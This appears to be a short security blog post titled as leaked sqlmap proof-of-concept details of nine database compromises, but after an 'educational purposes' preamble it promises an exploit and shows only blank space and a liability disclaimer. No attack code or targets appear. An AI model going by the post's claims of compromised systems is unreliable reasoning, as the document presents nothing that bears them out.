Channel: BOT24

9 Recent DB Compromises Via SqlMap PoC (leaked)

As always, this information is for educational purposes. We show these compromised systems so that you understand the current threat environment that surrounds us every day, and how important it is to take the appropriate countermeasures to safeguard your critical data, no matter what size your organization is, as well as your individual data-driven devices. Below is the PoC of the compromises. Again, as always, be proactive, not reactive, in safeguarding your critical data, and stay safe out there. As you are aware, this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so that you can implement the appropriate countermeasures, such as those described in ISO13335, to prevent yourselves from becoming victims in the current threat environment.

The exploit is provided below, as I will continue to monitor the net to safeguard systems and individuals' critical data. Additionally, this information is provided to our readers as an addendum to the California Database Security Breach Act.























//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.

